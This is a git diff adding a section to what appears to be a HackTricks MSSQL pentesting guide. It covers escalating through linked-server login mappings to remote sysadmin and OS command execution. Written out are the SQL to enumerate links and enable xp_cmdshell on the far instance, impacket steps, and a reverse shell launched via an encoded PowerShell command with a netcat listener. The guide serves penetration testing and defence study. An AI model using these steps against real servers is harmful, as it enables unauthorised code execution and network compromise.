diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 1a0cbe475ec..f6cc941317b 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -414,6 +414,53 @@ KRB5CCNAME=.ccache mssqlclient.py -no-pass -k ../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md {{#endref}} +#### Linked-server credential mapping -> remote `sysadmin` -> OS RCE + +Linked servers can be configured with a **non-self login mapping** (`Local Login` -> `Remote Login`). In that case, a low-privileged login on the first SQL Server can execute queries on the second one **as the mapped remote principal**. This works the same way even when the linked instance lives in **another domain or forest**. + +First enumerate the links and their mappings: + +```sql +EXEC sp_linkedservers; +EXEC sp_helplinkedsrvlogin ''; +``` + +Then verify which account you become on the remote side and whether it is `sysadmin`: + +```sql +EXEC ('SELECT SYSTEM_USER') AT []; +EXEC ('SELECT IS_SRVROLEMEMBER(''sysadmin'')') AT []; +``` + +If the mapped remote login is `sysadmin`, the linked server becomes a **remote code execution primitive** because you can reconfigure the far-end instance and run OS commands as the **SQL Server service account**: + +```sql +EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE;') AT []; +EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT []; +EXEC ('EXEC xp_cmdshell ''whoami''') AT []; +``` + +Using `impacket-mssqlclient`, the same workflow is usually faster: + +```bash +mssqlclient.py -windows-auth /:@ +# Inside the SQL shell: +enum_links +use_link [] +enable_xp_cmdshell +xp_cmdshell whoami +``` + +To upgrade single-command execution into an interactive shell, launch a reverse shell through `xp_cmdshell`: + +```bash +xp_cmdshell powershell -e +rlwrap -cAr nc -lnvp 443 +``` + +> [!TIP] +> If `xp_cmdshell` is disabled, the initial error often confirms that `sp_configure` / `RECONFIGURE` is the intended enablement path. Also look for exported policy files such as `Policy_Backup.inf` (`secedit /export` output), because they can expose local rights assignments (`SeImpersonatePrivilege`, `SeDebugPrivilege`, Kerberos skew, SMB signing, NTLM hardening) that help choose the next privilege-escalation step once you land on the SQL host. + ### **Write Files** To write files using `MSSQL`, we **need to enable** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), which requires admin privileges, and then execute some stored procedures to create the file: @@ -731,7 +778,9 @@ You probably will be able to **escalate to Administrator** following one of thes ## References - [Unit 42 – Phantom Taurus: WMI-driven direct SQL collection via batch/sqlcmd](https://unit42.paloaltonetworks.com/phantom-taurus/) +- [HTB: DarkZero - linked-server credential mapping to cross-forest RCE](https://0xdf.gitlab.io/2026/04/04/htb-darkzero.html) - [HTB: Signed - MSSQL coercion to silver ticket sysadmin](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) +- [Microsoft Learn - sp_helplinkedsrvlogin (Transact-SQL)](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-helplinkedsrvlogin-transact-sql) - [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users) - [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/) - [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/) @@ -802,4 +851,3 @@ Entry_3: ``` {{#include ../../banners/hacktricks-training.md}} -